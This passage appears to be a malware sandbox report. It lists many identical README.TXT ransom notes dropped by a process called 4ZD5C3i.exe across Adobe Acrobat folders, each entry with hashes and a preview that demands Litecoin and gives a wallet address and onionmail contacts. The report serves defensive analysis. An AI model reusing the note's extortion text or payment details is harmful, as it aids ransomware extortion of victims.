                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hu-hu\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\it-it\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ja-jp\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ko-kr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nb-no\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nl-nl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pl-pl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\da-dk\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\de-de\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\en-gb\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\es-es\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\fi-fi\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\fr-fr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\it-it\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\ja-jp\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
